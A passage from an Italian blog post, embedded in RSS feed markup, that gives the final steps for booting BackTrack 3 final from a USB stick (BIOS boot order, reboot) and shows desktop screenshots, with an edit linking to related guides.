<p class="MsoNormal"><a href="http://carlitobrigante.files.wordpress.com/2008/07/immagine27.jpg"><img class="aligncenter size-medium wp-image-501" src="http://carlitobrigante.files.wordpress.com/2008/07/immagine27.jpg?w=300&#038;h=225" alt="" width="300" height="225" /></a></p>
<p class="MsoNormal" style="text-align:center;">***</p>
<p class="MsoNormal"><a href="http://carlitobrigante.files.wordpress.com/2008/07/immagine33.jpg"><img class="aligncenter size-medium wp-image-497" src="http://carlitobrigante.files.wordpress.com/2008/07/immagine33.jpg?w=300&#038;h=225" alt="" width="300" height="225" /></a></p>
<p class="MsoNormal" style="text-align:center;">***</p>
<p class="MsoNormal">4- Riavviate il vostro pc e impostate il vostro <strong>BIOS</strong><span> </span>affinché faccia il boot da <strong>usb </strong>, salvate i cambiamenti e riavviate nuovamente.</p>
<p class="MsoNormal">5- Eseguito il reboot (con pen drive inserita), dovrebbe partire la vostra copia di <span style="text-decoration:underline;"><span style="color:#ff0000;">Backtrack</span></span> dalla memoria usb.</p>
<p class="MsoNormal">Questi sono 2 screenshoot della <strong><span style="text-decoration:underline;">versione USB</span></strong> di <strong><span style="text-decoration:underline;"><span style="color:#ff0000;">Backtrack 3</span></span>.final .</strong> Potete notare la grafica accattivante di <strong>Compiz Fusion</strong> già pronto all&#8217;uso  <img src='http://s.wordpress.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> </p>
<p class="MsoNormal" style="text-align:center;">***<a href="http://carlitobrigante.files.wordpress.com/2008/07/snapshot1.png"><img class="aligncenter size-medium wp-image-498" src="http://carlitobrigante.files.wordpress.com/2008/07/snapshot1.png?w=300&#038;h=225" alt="" width="300" height="225" /></a></p>
<p class="MsoNormal" style="text-align:center;">***</p>
<p class="MsoNormal"><a href="http://carlitobrigante.files.wordpress.com/2008/07/snapshot21.png"><img class="aligncenter size-medium wp-image-502" src="http://carlitobrigante.files.wordpress.com/2008/07/snapshot21.png?w=300&#038;h=225" alt="" width="300" height="225" /></a></p>
<p class="MsoNormal" style="text-align:center;">***</p>
<p class="MsoNormal">Ciao a tutti e alla prossima.</p>
<p class="MsoNormal">
<p style="text-align:center;">[edit]</p>
<p>scrivo queste due righe per precisare che la procedura eseguita con la 3.beta a riguardo dei livechenges può essere in egualmodo adattata alla 3.final , quindi chi vuole può far riferimento alla guida<strong> BackTrack tutto dalla 2.final alla 3.beta</strong> , nella sezione <strong>/install</strong>.</p>
<p>Chi invece vuole , sempre da usb , usare la BackTrack-3.final con il metodo descritto per la 2.final , può crearsi delle partizioni e salvarci i cambiamenti secondo il metodo descritto in <a href="http://forums.remote-exploit.org/showthread.php?t=7844" target="_blank"><span style="text-decoration:underline;"><em><strong>questo</strong></em></span></a> post sul forums.remote-exploit.org.</p>
<p style="text-align:center;">[/edit]</p>
<p class="MsoNormal">
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/carlitobrigante.wordpress.com/479/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/carlitobrigante.wordpress.com/479/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/carlitobrigante.wordpress.com/479/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/carlitobrigante.wordpress.com/479/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/carlitobrigante.wordpress.com/479/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/carlitobrigante.wordpress.com/479/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/carlitobrigante.wordpress.com/479/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/carlitobrigante.wordpress.com/479/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/carlitobrigante.wordpress.com/479/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/carlitobrigante.wordpress.com/479/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/carlitobrigante.wordpress.com/479/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/carlitobrigante.wordpress.com/479/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=carlitobrigante.wordpress.com&blog=1680906&post=479&subd=carlitobrigante&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://carlitobrigante.wordpress.com/2008/07/02/installazione-di-backtrack-3final-su-usb-da-windows/feed/</wfw:commentRss>
		<slash:comments>34</slash:comments>
	
		<media:content url="" medium="image">
			<media:title type="html">redbar0n</media:title>
		</media:content>

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/07/eee.png?w=96" medium="image" />

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/07/immagine104.jpg?w=300" medium="image" />

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/07/immagine27.jpg?w=300" medium="image" />

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/07/immagine33.jpg?w=300" medium="image" />

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/07/snapshot1.png?w=300" medium="image" />

		<media:content url="http://carlitobrigante.files.wordpress.com/2008/07/snapshot21.png?w=300" medium="image" />
	</item>
	</channel>
</rss>